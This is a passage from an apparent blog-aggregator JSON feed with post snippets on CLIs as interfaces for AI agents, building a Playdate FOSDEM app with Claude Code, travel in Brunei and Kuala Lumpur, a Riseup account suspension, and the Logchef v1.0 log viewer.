Markdown file serves as a few-shot prompt, teaching the model how to use the tool effectively without rigid code constraints.\nI maintain similar skill sets for AWS, Kubernetes, and Nomad. The AWS skill doesn’t wrap boto3; it simply documents useful aws ec2 and aws cloudwatch commands.\nThe Developer Experience: uv and Single-File CLIs#\nWhen a CLI doesn’t exist, the barrier to creating one has never been lower. Modern Python tooling, specifically uv with its inline script metadata, allows us to treat CLIs as disposable, single-file artifacts.\nI recently needed an agent to manage my Trello board. Rather than fighting with the Trello API documentation or looking for an abandoned library, I had the agent generate a CLI wrapper:\n#!\u002Fusr\u002Fbin\u002Fenv -S uv run --script\n# \u002F\u002F\u002F script\n# requires-python = \">=3.11\"\n# dependencies = [\"typer\", \"httpx\", \"rich\"]\n# \u002F\u002F\u002F\n\nimport typer\nimport httpx\nimport json\n\napp = typer.Typer()\n\n@app.command()\ndef list_cards(list_id: str, format: str = \"table\"):\n    \"\"\"Fetch all cards from a specific list.\"\"\"\n    # Implementation details...\nThis script is self-contained. It defines its own dependencies. It implements --help and --json automatically via typer. It took minutes to generate and immediately unlocked Trello capabilities for the agent.\nThe SaaS Imperative#\nThe strategic takeaway for SaaS founders and platform engineers is significant. Your CLI is no longer just a developer convenience; it is your primary AI API.\nWe are moving past the era where a REST API and a web dashboard are sufficient. If your product lacks a terminal interface, you are locking out the growing workforce of AI agents.\nBrowser Automation is brittle, slow, and breaks with every UI update.\nDirect API Integration puts the burden of schema management on the user.\nCLIs offer a stable, discoverable, and composable interface that agents can learn and use autonomously.\nThe “hobby” CLI wrappers built by enthusiasts, such as those for Notion, Jira, or Spotify, are no longer just developer conveniences. They are becoming critical infrastructure. 
They provide the stable, text-based interface required for agents to interact with these platforms reliably.\nIf you want your platform to be AI-ready, don’t just build an MCP server. Build a great CLI. Make sure it supports --json. Write good man pages. The agents will figure out the rest.",[],{"slug":196,"title":197,"link":198,"pubDate":199,"contentSnippet":200,"tags":201,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"code-is-cheap","Code is cheap. Show me the talk.","https:\u002F\u002Fnadh.in\u002Fblog\u002Fcode-is-cheap\u002F","Fri, 30 Jan 2026 00:00:00 +0000","TLDR; Software development, as it has been done for decades, is over. LLM coding tools have changed it fundamentally for the better or worse.\n“Talk is cheap. Show me the code.” — Linus Torvalds, August 2000",[],"Kailash Nadh","knadh","\u002Fimages\u002Fknadh_photo.jpg","https:\u002F\u002Fnadh.in\u002Findex.xml",{"slug":207,"title":208,"link":209,"pubDate":210,"contentSnippet":211,"tags":212,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"kurbelfahrplan","Making Kurbelfahrplan","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2026\u002F01\u002F27\u002Fkurbelfahrplan\u002F","2026-01-27T00:00:00.000Z","I recently published Kurbelfahrplan, a FOSDEM schedule\napp for the Playdate. This was the first project\nwhere I’ve been quite happy with using Claude Code for development, and used\nit much beyond Copilot autocomplete and came closer to vibe-coding.\n\nYou can see the complete development transcript\nof my claude-code session. It was interesting as a 2-day greenfield project and I\nthought it might be nice to document my learnings\u002Fprocess a little bit.\nI’d attempted building a game and an app on the playdate before (still WIP) so\nI had some experience with the tooling. I’d moved on when faced with Lua\nrefactoring challenges1.\nThis time around, I had a fairly good idea of what the final app would look like:\nthe playdate has a lot of constraints that restrict the design space, and\nexisting apps all have feature parity.\nHere’s some of the things I tried:\nSpecification\nGave a prompt to Gemini Pro and had it generate a SPEC. It included a link to the SDK,\na mention of the timezone workaround\n2 - I wanted the app to only work in UTC+1 to avoid confusion. I passed it enough context\nfrom the schedule.ics file, and on the data storage layer (make separate tables for each Devroom). I don’t have the prompt anymore but it was something like:\nwrite a specification (passed to claude code) for a playdate lua app that will be a fosdem schedule calendar app. See\nplaydate docs at $link. At launch, we want to check the timezone by doing a diff between\nepochFromTime and epochFromGMTTime, and then download the latest schedule in ICS format\nfrom $link. 
Save the schedule as multiple tables in lua, one table for each category.\nCreate a browser using playdate gridview, display title and location in the first line\nand a scrollable list of talks below it.\nOnly use the DTSTART, DTEND, SUMMARY, CATEGORIES, URL, LOCATION fields from the ICS file.\nThe user should be able to switch the category with left\u002Fright as well as the crank\nRespect shouldDisplay24HourTime\non selecting a talk, show a talk details page with the title, and a QR code for the talk.\nI corrected the SPEC a bit, and you can see it (very lightly edited since)\nin the repo\nDay 1\nI assumed that Claude wouldn’t have enough training data on Playdate APIs, so I went through the SDK docs,\nand copied out whatever I felt relevant to a txt file. In my case, I didn’t care for video, audio, and most graphics\nAPIs. This turned out to be 89KB of text. Passed it along with the spec to Opus in the first\nsession, which immediately got lost trying to fetch the schedule, so I had to wget it and force it to\nonly read 100 lines. The plan it generated looked okay, so I went ahead.\nFixing Bugs and Progress\nThe first version was buggy (it did compile), but none of the bugs were major and I got it working in a few more\nprompts and manual fixes.\nThe timezone code was incorrect at first sight.\nAsked for name suggestions, picked the first one.\nRan the app on the simulator, and it broke because it tried to use the network permission incorrectly.\nA lot of effort went into fixing unicode problems (I attempted to solve this at first on the playdate layer, but moved it to python scripts that fetch and parse the schedule).\nLaunched the app on device to realize: Parsing a really large ICS file times out on the device, and generating QR codes takes 15-20 seconds. Switched both to build time. The playdate docs suggest pre-generating QR codes.\nLots of layout bugs. In particular, the talk text on the schedule list was never visible and no prompting fixed it - it assumed a black\u002Fwhite color and paint-mode bug. I went in and looked: the generated font height was too low. This was, however, expected in the absence of a fast feedback loop.\nI’d often write one-time scripts with a prompt like:\n\nWrite a Python script inside scripts directory that has zero dependencies,\nfetches https:\u002F\u002Ffosdem.org\u002F2026\u002Fschedule\u002Fical, parses the ICS and saves it as\na large JSON array of arrays. Each item in the large array is an event. The\nevent is represented as a list of [ID, SUMMARY,\nCATEGORIES,LOCATION,DTSTART,DTEND]. ID is extracted from the URL\n(https:\u002F\u002Ffosdem.org\u002F2026\u002Fschedule\u002Fevent\u002FL3BK7S-free-as-in-burned-out\u002F ->\nL3BK7S).
We do not use any keys to compact space.\n\nDecided to remove the Network Sync code, since I could not parse the fetched content at runtime anyway.\nGenerated a HACKING.md to document the code so I can pick up the session.\nFixed a few more silly state bugs.\nDay 2 Progress\nI decided to tackle the harder problems, and they were one-shotted fairly nicely:\nA Devroom configuration page to configure which rooms to show.\nCreate a stands browser\nHave a home page landing UI.\nMaps View\nSaved talks\nAbout Page (inheriting the work from the Talk View)\nThe code for all of these features is not very elegant, but I didn’t care that much - it was\nfunctional and performant for an app that nobody uses beyond 2 days.\nMaps\nI attempted to resize and clean up the maps manually but it was too much\neffort (Building H map in the app is mine). Then went with Gemini Pro to get\na dithered map out instead, which wasn’t perfect either and looked worse when\nscaled down. Switched to a “pan view” instead and that worked okay.\nStill not very happy here3 - I might switch to the maps that are used in the\nFOSDEM iOS app instead.\nOverall Notes\nI’d rate Claude’s contribution at somewhere around 60% - I found it faster to\nmanually fix lots of bugs (also realizing that there is an extra overhead in\nunderstanding the code before I can actually fix it). However, for things where I\ndon’t have experience - game state management, input handling - I was able to\nrely on Claude to get them mostly right. I used Opus throughout the project,\nand this is the first model that writes code similar in shape to what\nI’d write.\nSee you at FOSDEM?\nIf you’d like to try the app, come say hi at FOSDEM. I’ll be at the FOSS United Booth\nin Building K, Level 2. Or drop me a message. Bug reports are accepted in\nperson only. Kurbelfahrplan is Beerware, so buy me a beer if you like it!\nI wanted to switch from my custom list view to the gridview in the Playdate SDK and it took me too much time and effort to make the refactor work. ↩\nThere is no way to get the timezone in the playdate lua SDK, so you need a workaround. ↩\nOne of my ideas is to switch to a leaflet maptile renderer instead and pre-fetch all tiles from https:\u002F\u002Fnav.fosdem.org\u002F. ↩",[],"Nemo","captn3m0","\u002Fimages\u002Fcaptn3m0_photo.jpg","https:\u002F\u002Fcaptnemo.in\u002Fatom.xml",{"slug":218,"title":219,"link":220,"pubDate":221,"contentSnippet":222,"tags":223,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"e0-ae-ae-e0-ae-be-e0-ae-b1-e0-af-8d-e0-ae-b1-e0-ae-99-e0-af-8d-e0-ae-95-e0-ae-b3-e0-af-87-e0-ae-b5-e","Changes Are the Question, Changes Are the Answer!","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2026\u002F01\u002F19\u002F%e0%ae%ae%e0%ae%be%e0%ae%b1%e0%af%8d%e0%ae%b1%e0%ae%99%e0%af%8d%e0%ae%95%e0%ae%b3%e0%af%87-%e0%ae%b5%e0%ae%bf%e0%ae%a9%e0%ae%be-%e0%ae%ae%e0%ae%be%e0%ae%b1%e0%af%8d%e0%ae%b1%e0%ae%99%e0%af%8d\u002F","Mon, 19 Jan 2026 18:56:48 +0000","One day, you will certainly come across messy code in some way or another. Don’t mock the developer who wrote it. Sometimes it might even be code you wrote yourself. I have seen many developers open a file and say, “Who wrote this garbage? Let’s just rewrite everything.” But context is very important. […] That is why you should not pass judgment by looking at the code alone.
For this […]",[224,225,226,227,228],"Uncategorized","legacy","philosophy","programming","refactoring",{"slug":230,"title":231,"link":232,"pubDate":233,"contentSnippet":234,"tags":235,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"brunei","My experiences in Brunei","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fbrunei\u002F","Sat, 17 Jan 2026 22:45:23 +0530","In December 2024, Badri and I went to Brunei’s capital, Bandar Seri Begawan. Brunei—officially Brunei Darussalam—is a country in Southeast Asia, located on Borneo Island. It is one of the few remaining absolute monarchies on Earth.\nOn the morning of the 10th of December 2024, we reached Brunei International Airport by taking a flight from Kuala Lumpur. Upon arrival at the airport, we had to go through immigration, of course. When I was standing in the queue, I was reminded that I hadn’t filled out my arrival card. So I filled it out and submitted it online while I was in the queue.\nThe immigration officer asked me how much cash I was carrying of each currency. After completing the formalities, the immigration officer stamped my passport and let me in. Take a look at Brunei’s entry stamp in my passport.\n\nBrunei entry stamp on my passport. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0.\nWe exchanged Singapore dollars to get some Brunei dollars at the airport. The Brunei dollar was pegged 1:1 with the Singapore dollar, meaning 1 Singapore dollar equals 1 Brunei dollar. The exchange rate we received at the airport was the same.\nOur (pre-booked) accommodation was located near Gadong Mall. So, we went to the information center at the airport to ask how to get there by public transport. However, the person at the information center told us that they didn’t know the public transport routes and suggested we take a taxi instead.\nWe came out of the airport and came across an Indian man with a bus. The bus seemed more like a minibus by Indian standards. He offered to drop us at our accommodation for 10 Brunei dollars (₹630). As we were tired after a sleepless night, we didn’t negotiate and took the offer. There was nobody else on the bus, and it felt a bit weird using the minibus as our private taxi.\nIn around half an hour, we reached our accommodation. The place was more like a guest house than a hotel. In addition to the rooms, it had a common space consisting of a hall, a kitchen, and a balcony.\n\nOur room in Brunei. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0.\nUpon reaching the place, we paid for our room in cash, which was 66.70 Singapore dollars (4200 Indian rupees) for two nights. We arrived before the check-in time, so we had to wait for our room to get ready before we entered.\nThe room had a double bed and also a place to hang clothes. We slept for a few hours before going out at night. We went into Gadong Mall and had coffee at a café named The Coffee Bean & Tea Leaf. The regular caffe latte I had here was 5.20 Brunei dollars. On another note, the snacks we got in Kuala Lumpur covered us for dinner.\nThe next day—11th of December 2024—we went to a nearby restaurant named Nadj for lunch. The owner was from Kerala. Here we ordered:\n1 paneer pepper masala for 5 Brunei dollars (320 rupees)\n1 nasi goreng pattaya biasa for 4.50 Brunei dollars (290 rupees)\n1 plain naan for 1.50 Brunei dollars (100 rupees)\n1 butter naan for 1.80 Brunei dollars (115 rupees)\nSo, our lunch cost a total of 12.80 Brunei dollars (825 rupees).
I didn’t like the fact that the naan was unusually thick.\nAfter lunch, we planned to visit Brunei’s famous Omar Ali Saifuddien Mosque. However, a minibus driver outside of Gadong Mall told us that the mosque would be closed in half an hour and suggested we visit the nearby Jame’ Asr Hassanil Bolkiah Mosque instead.\n\nJame’ Asr Hassanil Bolkiah Mosque. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0.\nHe dropped us there for 1 Brunei dollar per person, which seemed like the standard rate for any bus ride in Brunei. The person hailed from Uttar Pradesh and told us about bus routes in Hindi. Bus routes in Brunei were confusing, so the information he gave us was valuable.\nIt was evening, and we had the impression that the mosque and its premises were closed. However, soon enough, we stumbled across an open gate leading into the mosque complex. We walked inside for some time, took pictures, and exited. Walking in Bandar Seri Begawan wasn’t pleasant, though. The pedestrian infrastructure wasn’t good.\nThen we walked back to our place and bought some souvenirs. For dinner and breakfast, we bought bread, fruits, and eggs from local shops, as we had a kitchen to cook for ourselves.\nThe guest house also had a washing machine (free of charge), which we wanted to use. However, they didn’t have detergent. Therefore, we went outside to get some detergent. It was 8 o’clock, and most of the shops were closed already. Others had detergents only in large sizes, the ones you would use if you lived there. We ended up getting a small packet at a supermarket.\nThe next day—the 12th of December—we had a flight to Ho Chi Minh City in Vietnam with a long layover in Kuala Lumpur. We had breakfast in the morning and took a bus to Omar Ali Saifuddien Mosque. The mosque was in a prayer session, so it was closed to visitors. Therefore, we just took pictures from the outside and took a bus to the airport.\n\nOmar Ali Saifuddien Mosque. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0.\nWhen the bus neared the airport, it went straight rather than taking the left turn for the airport. Initially, I thought the bus would just take a turn and come back. However, the bus kept going away from the airport. Confused by this, I asked other passengers if the bus was going to the airport. The driver stopped the bus at Muara Town terminal—20 km from the airport. At this point, everyone alighted, except for us. The driver went to a nearby restaurant to have lunch.\nI felt very uncomfortable stranded in a town that was 20 km from the airport. We had a lot of time, but I was still worried about missing our flight, as I didn’t want to get stuck in Brunei. After waiting for 15 minutes, I went inside the restaurant and reminded the driver that we had a flight in a couple of hours and needed to go to the airport. He said he would leave soon.\nWhen he was done with his lunch, he drove us to the airport. It was incredibly frustrating. On a positive note, we saw countryside in Brunei that we would not have seen otherwise. The bus ride cost us 1 Brunei dollar each.\n\nA shot of Brunei’s countryside. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0.\nThat’s it for this one. Meet you in the next one.
Stay tuned for the Vietnam post!\nThanks to Badri for proofreading.",[],{"slug":237,"title":238,"link":239,"pubDate":240,"contentSnippet":241,"tags":242,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-1","A Consciousness is A Dedekind Cut","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fconsciousness-lives-in-a-dedekind-cut\u002Findex.html","Fri, 16 Jan 2026 00:00:00 +0000","Aiming for last place at the 2025 Berggruen Prize Open Essay Contest, on the theme of consciousness, intelligence, and the nature of mind in an age of advancing artificial systems.",[55,243,244,245,246],"writing","ai","intelligence_augmentation","tools_for_thought",{"slug":248,"title":249,"link":250,"pubDate":251,"contentSnippet":252,"tags":253,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"suspension-of-my-riseup-account","Why my Riseup account got suspended (and reinstated)","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsuspension-of-my-riseup-account\u002F","Wed, 07 Jan 2026 23:54:04 +0530","Disclaimer: The goal of this post is not to attack Riseup. In fact, I love Riseup and support their work.\nStory\nRiseup is an email provider, known for its privacy-friendly email service. The service requires an invite from an existing Riseup email user to get an account.\nI created my account on Riseup in the year 2020, of course with the help of a friend who invited me. Since then, I have used the email address only occasionally, although it is logged into my Thunderbird all the time.\nFast-forward to the 4th of January 2026, when Thunderbird suddenly told me that it could not log in to my Riseup account. When I tried logging in using their webmail, it said “invalid password”. Finally, I tried logging in to my account on their website, and was told that…\nLog in for that account is temporary suspended while we perform maintenance. Please try again later.\nAt this point, I suspected that the Riseup service itself was facing some issues. I asked a friend who had an account there if the service was up, and they said that it was. The issue seemed to be specific only to my account.\nI contacted Riseup support and informed them of the issue. They responded the next day (the 5th of January) saying:\nThe my-username-redacted account was found inviting another account that violated our terms of use. As a security measure we suspend all related accounts to ToS violations.\n(Before we continue, I would like to take a moment and reflect upon how nice it was to receive response from a human rather than an AI bot—a trend that is unfortunately becoming the norm nowadays.)\nI didn’t know who violated their ToS, so I asked which account violated their terms. Riseup told me:\nusername-redacted@riseup.net attempted to create aliases that could be abused to impersonate riseup itself.\nI asked a friend whom I invited a month before the incident, and they confirmed that the username belonged to them. When I asked what they did, they told me they tried creating aliases such as floatup and risedown. 
I also asked Riseup which aliases violated their terms, but their support didn’t answer this.\nI explained to Riseup support that the “impersonation” wasn’t intentional, that the user hadn’t sent any emails, and that I had been a user for more than 5 years and had donated to them in the past.\nFurthermore, I suggested that they should block the creation of such aliases if they think the aliases violate their terms, like how email providers typically don’t allow users to create admin@ or abuse@ email addresses.\nAfter I explained myself, Riseup reinstated my account.\nUpdate on the 10th of January 2026: My friend told me that the alias that violated Riseup’s terms was cloudadmin, and his account was reinstated on the 7th of January.\nIssues with suspension\nI have the following issues regarding the way the suspension took place —\nThere was no way of challenging the suspension before the action was taken.\nThe action taken against me was disproportionate. Remember that I didn’t violate any terms. It was allegedly done by a user I invited. They could have just blocked the aliases while continuing the discussion in parallel.\nI was locked out of my account with no way of saving my emails and without any chance to migrate. What if that email address was being used for important stuff such as bank access or train tickets? I know people who use Riseup email for such purposes.\nThe violation wasn’t even proven. I wasn’t told which alias violated the terms, or how it could be used to impersonate Riseup itself.\nWhen I brought up the issue of me getting locked out of my account without a way of downloading my emails or migrating my account, Riseup support responded by saying:\nYou must understand that we react [by] protecting our service, and therefore we cannot provide notice messages on the affected accounts. We need to act preventing any potential damage to the service that might affect the rest of the users, and that measure is not excessive (think on how abusers\u002Fspammers\u002Fscammers\u002Fetc could trick us and attempt any action before their account is suspended).\nThis didn’t address my concerns, so let’s move on to the next section.\nRoom for improvement\nHere’s how I think Riseup’s ban policy could be changed while still protecting against spammers and other bad actors:\nEven if Riseup can’t provide notice to blocked accounts, perhaps they can scale back limitations on the inviting account which wasn’t even involved—for example, by temporarily disabling invites from that account until the issue is resolved.\nIn this case, the person didn’t impersonate Riseup, so Riseup could have just blocked the aliases and let the user know about it, rather than banning the account outright.\nRiseup should give blocked users access to their existing emails so they have a chance to migrate them to a different provider. (Riseup could disable SMTP and maybe incoming emails but keep IMAP access open.) I know people who use Riseup for important things such as bank or train tickets, and a sudden block like this is not a good idea.\nRiseup should factor in the account profile when making these decisions. I had an account on their service for 5 years and I had only created around 5 invites. (I don’t remember the exact number and there’s no way to retrieve this information.) This is not exactly an attacker profile.
I feel long-term users like this deserve an explanation for a ban.\nI understand Riseup is a community-run service and does not have unlimited resources like big corporations or commercial email providers do. Their actions felt disproportionate to me because I don’t know what issues they face behind the scenes. I hope someone can help to improve the policies, or at least shed light on why they are the way they are.\nSigning off now. Meet you in the next one!\nThanks to Badri and Contrapunctus for reviewing this blog post",[],{"slug":255,"title":256,"link":257,"pubDate":258,"contentSnippet":259,"tags":260,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"lifes-purpose","Life’s Purpose","https:\u002F\u002Fwww.prashanthudupa.com\u002Flifes-purpose\u002F","Sun, 04 Jan 2026 18:13:22 +0000","As Turiya, what is the purpose of life? The purpose of a body-mind-personality system is easy to define in terms of goals, ambitions, aspirations and so on. But, as Turiya, what really is the purpose of life? The purpose of life is to make space for Karma to express and extinguish itself. The content of […]",[148,149],{"slug":262,"title":263,"link":264,"pubDate":265,"contentSnippet":266,"tags":267,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kuala-lumpur","Transit through Kuala Lumpur","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkuala-lumpur\u002F","Wed, 31 Dec 2025 19:35:53 +0530","In my last post, Badri and I reached Kuala Lumpur - the capital of Malaysia - on the 7th of December 2024. We stayed in Bukit Bintang, the entertainment district of the city. Our accommodation was pre-booked at “Manor by Mingle”, a hostel where I had stayed for a couple of nights in a dormitory room earlier in February 2024.\nWe paid 4937 rupees (the payment was online, so we paid in Indian rupees) for 3 nights for a private room. From the Terminal Bersepadu Selatan (TBS) bus station, we took the metro to the Plaza Rakyat LRT station, which was around 500 meters from the hostel. Upon arriving at the hostel, we presented our passports at their request, followed by a 20 ringgit (400 rupee) deposit which would be refunded once we returned the room keys at checkout.\n\n      \nManor by Mingle - the hostel where we stayed at during our KL transit. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nOur room was upstairs and it had a bunk bed. I had seen bunk beds in dormitories before, but this was my first time seeing a bunk bed in a private room. The room did not have any toilets, so we had to use shared toilets.\nUnusually, the hostel was equipped with a pool. It also had a washing machine with dryers - this was one of the reasons we chose this hostel, because we were traveling light and hadn’t packed too many clothes. The machine and dryer cost 10 ringgits (200 rupees) per use, and we only used it once. The hostel provided complimentary breakfast, which included coffee. Outside of breakfast hours, there was also a paid coffee machine.\nDuring our stay, we visited a gurdwara - a place of worship for Sikhs - which was within walking distance from our hostel. The name of the gurdwara was Gurdwara Sahib Mainduab. However, it wasn’t as lively as I had thought. The gurdwara was locked from the inside, and we had to knock on the gate and call for someone to open it. A man opened the gate and invited us in.\nThe gurdwara was small, and there was only one other visitor - a  man worshipping upstairs. 
We went upstairs briefly, then settled down on the first floor.\nWe had some conversations with the person downstairs who kindly made chai for us. They mentioned that the langar (community meal) is organized on every Friday, which was unlike the gurdwaras I have been to where the langar is served every day. We were there for an hour before we left.\nWe also went to Adyar Ananda Bhavan (a restaurant chain) near our hostel to try the chain in Malaysia. The chain is famous in Southern India and also known by its short name A2B. We ordered\nan onion dosa for 10 ringgits (200 rupees),\n1 masala tea for 6 ringgits (120 rupees),\n2 pooris for 8 ringgits (160 rupees) and\n1 plate potato bajji for 7 ringgits (140 rupees).\n\n      \nDosa served at Adyar Ananda Bhavan. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nAll this came down to around 33 ringgits (including taxes), i.e. around 660 rupees. We also purchased some snacks such as murukku from there for our trip.\nWe had planned a day trip to Malacca, but had to cancel it due to rain. We didn’t do a lot in Kuala Lumpur, and it ended up acting as a transit point for us to other destinations: flights from Kuala Lumpur were cheaper than Singapore, and in one case a flight via Kuala Lumpur was even cheaper than a direct flight!\nWe paid 15,000 rupees in total for the following three flights:\nKuala Lumpur to Brunei,\nBrunei to Kuala Lumpur, and\nKuala Lumpur to Ho Chi Minh City (Vietnam).\nThese were all AirAsia flights. The cheap tickets, however, did not include any checked-in luggage, and the cabin luggage weight limit was 7 kg. We also bought quite some stuff in Kuala Lumpur and Singapore, leading to an increase in the weight of our luggage.\nWe estimated that it would be cheaper for us to take only essential items such as clothes, cameras, and laptops, and to leave behind souvenirs and other non-essentials in lockers at the TBS bus stand in Kuala Lumpur, than to pay more for check-in luggage. It would take 140 ringgits for us to add a checked-in bag from Kuala Lumpur to Bandar Seri Begawan and back, while the cost for lockers was 55 ringgits at the rate of 5 ringgits every six hours.\nWe had seen these lockers when we alighted at the bus stand while coming from Johor Bahru. There might have been lockers in the airport itself as well, which would have been more convenient as we were planning to fly back in soon, but we weren’t sure about finding lockers at the airport and we didn’t want to waste time looking.\nWe had an early morning flight for Brunei on the 10th of December. We checked out from our hostel on the night of the 9th of December, and left for TBS to take a bus to the airport. We took a metro from the nearest metro station to TBS. Upon reaching there, we put our luggage in the lockers. The lockers were automated and there was no staff there to guide us.\n\n      \nLockers at TBS bus station. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nWe bought a ticket for the airport bus from a counter at TBS for 26 ringgits for both of us. In order to give us tickets, the person at the counter asked for our passports, and we handed it over to them promptly. Since paying in cash did not provide any extra anonymity, I would advise others to book these buses online.\nIn Malaysia, you also need a boarding pass for buses. The bus terminal had kiosks for getting these printed, but they were broken and we had to go to a counter to obtain them. 
The boarding pass mentioned our gate number and other details such as our names and departure time of the bus. The company was Jet Bus.\n\n      \nMy boarding pass for the bus to the airport in Kuala Lumpur. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nTo go to our boarding gate, we had to scan our boarding pass to let the AFC gates open. Then we went downstairs, leading into the waiting area. It had departure boards listing the bus timings and their respective gates. We boarded our bus around 10 minutes before the departure time - 00:00 hours. It departed at its scheduled time and took 45 minutes to reach KL Airport Terminal 2, where we alighted.\nWe reached 6 hours before our flight’s departure time of 06:30. We stopped at a convenience store at the airport to have some snacks. Then we weighed our bags at a weighing machine to check whether we were within the weight limit. It turned out that we were.\nWe went to an AirAsia counter to get our boarding passes. The lady at our counter checked our Brunei visas carefully and looked for any Brunei stamps on the passports to verify whether we had used that visa in the past. However, she didn’t weigh our bags to check whether they were within the limit, and gave us our boarding passes.\nWe had more than 4 hours to go before our flight. This was the downside of booking an early morning flight - we weren’t able to get a full night’s sleep.\nA couple of hours before our flight time, we were hanging around our boarding gate. The place was crowded, so there were no seats available. There were no charging points. There was a Burger King outlet there which had some seating space and charging points. As we were hungry, we ordered two cups of cappuccino coffee (15.9 ringgits) and one large french fries (8.9 ringgits) from Burger King. The total amount was 24 ringgits.\nWhen it was time to board the flight, we went to the waiting area for our boarding gates. Soon, we boarded the plane. It took 2.5 hours to reach the Brunei International Airport in the capital city of Bandar Seri Begawan.\n\n      \nView of Kuala Lumpur from the aeroplane. Photo by Ravi Dwivedi. 
Released under the CC-BY-SA 4.0.\nStay tuned for our experiences in Brunei!\nCredits: Thanks to Badri, Benson and Contrapunctus for reviewing the draft.",[],{"slug":269,"title":270,"link":271,"pubDate":272,"contentSnippet":273,"tags":274,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-2","After \"AI\": Anticipating a post-LLM science & technology revolution","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fafter-ai\u002Findex.html","Mon, 29 Dec 2025 00:00:00 +0000","I, for one, welcome the coming age of the post-LLM-datacenter-overinvestment-bust-fueled backyard GPU supercomputer revolution.",[55,49,244,245,246],{"slug":276,"title":277,"link":278,"pubDate":279,"contentSnippet":77,"tags":280,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"busting-the-common-misconception-faster-languages-alone-dont-guarantee-faster-trade-execution-1fc197","Busting the Common Misconception: Faster Languages, Desktop Apps, and Broker APIs Do Not…","https:\u002F\u002Fopenalgo.medium.com\u002Fbusting-the-common-misconception-faster-languages-alone-dont-guarantee-faster-trade-execution-1fc197a6804c?source=rss-cda86e929c3------2","Fri, 26 Dec 2025 16:55:51 GMT",[80,281,282,81,82],"kit-sdk","trading",{"slug":284,"title":285,"link":286,"pubDate":287,"contentSnippet":288,"tags":289,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"logchef-v1","Logchef v1.0: The Journey to a Real Log Viewer","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Flogchef-v1\u002F","2025-12-22T00:00:00.000Z","About eight months ago I wrote about Logchef – a log viewer I’d been building to scratch my own itch with log exploration at work. Back then it was basically a nicer way to query ClickHouse without writing raw SQL every time. Today I’m shipping v1.0, and it’s evolved into something I didn’t quite expect.\n\n\nLet me walk through the major features that made it to 1.0 and some of the engineering decisions behind them.\nAlerting with Alertmanager Integration#\nIn that first post, I mentioned alerting as a “roadmap” item. It always felt like the obvious next step – you find a pattern in your logs, you want to know when it happens again.\n\n\nBut building it took longer than expected. My first attempt was a “rooms” system – a home-grown notification router with its own email, Slack, and webhook channels. I got it working, then stared at the code for notification deduplication, grouping, silencing, and escalation. All problems that Alertmanager has already solved and battle-tested in production for years.\nSo I ripped out rooms and integrated Alertmanager instead. Now Logchef just fires alerts to Alertmanager, and you get all the routing logic – Slack, PagerDuty, email, webhooks, silencing, grouping, inhibition – without me reinventing it poorly.\nThe workflow is simple: write a LogchefQL or SQL query, set a threshold (e.g., “fire if count > 100”), pick a frequency, configure severity and labels. Logchef runs your query on schedule, evaluates the threshold, and if it triggers, fires an alert. Alert history is stored with execution logs so you can debug why something fired (or didn’t).\nLogchefQL: From Toy Parser to Production Backend#\nThe query language I wrote about originally was pretty basic – just filters that compiled to SQL on the frontend. Over the months it grew into something more capable, but more importantly, I rewrote the entire parser in Go and moved it to the backend. 
This also opens the door for a CLI tool later – same parser, same query language, different interface.\nHere’s what LogchefQL looks like now:\nnamespace=\"prod\" AND level=\"error\" | message, trace_id\nThe pipe operator (|) selects specific columns instead of SELECT *:\nmsg.level=\"ERROR\" | timestamp, msg.request.method\nDot notation handles nested JSON fields. If your logs have a log_attributes Map column with nested data:\nlog_attributes.user.name = \"john\"\nFor keys that contain dots (common in OTEL-style logs), use quoted field syntax:\nlog_attributes.\"http.status_code\" >= 500\nWhy Move Parsing to the Backend?#\nThe original frontend parser was TypeScript. It worked, but had problems:\nInconsistency: The frontend generated SQL, but the backend had no idea what that SQL meant. Validation happened in two places.\nType-awareness: ClickHouse has Map, JSON, LowCardinality, and various string types. The frontend didn’t know the schema, so it couldn’t generate optimal SQL for each column type. For a Map(String, String) column, you want mapContains() or ['key'] access. For JSON, you want JSONExtractString(). For regular String, it’s a simple comparison.\nDebugging hell: When a query failed, was it the parser? The SQL generator? ClickHouse syntax? Everything happened client-side, invisible to server logs.\nThe new architecture is cleaner:\nFrontend                  Backend\n   |                         |\n   | --- LogchefQL query --> |\n   |                         | --> Parse (Go)\n   |                         | --> Validate against schema\n   |                         | --> Generate type-aware SQL\n   | \u003C-- SQL + results ----- | --> Execute on ClickHouse\nThe backend exposes three endpoints: \u002Flogchefql\u002Ftranslate (returns the SQL for “View as SQL”), \u002Flogchefql\u002Fvalidate (real-time validation with debouncing), and \u002Flogchefql\u002Fquery (parse, validate, execute, return results).\nMoving parsing to the backend also made the field sidebar implementation cleaner – the same schema-aware code that generates WHERE clauses can filter field values based on your current query.\nThe Field Sidebar#\nIf you’ve used Kibana, you know the interaction: click a field, see its top values, click a value to add it as a filter. It’s the fastest way to explore 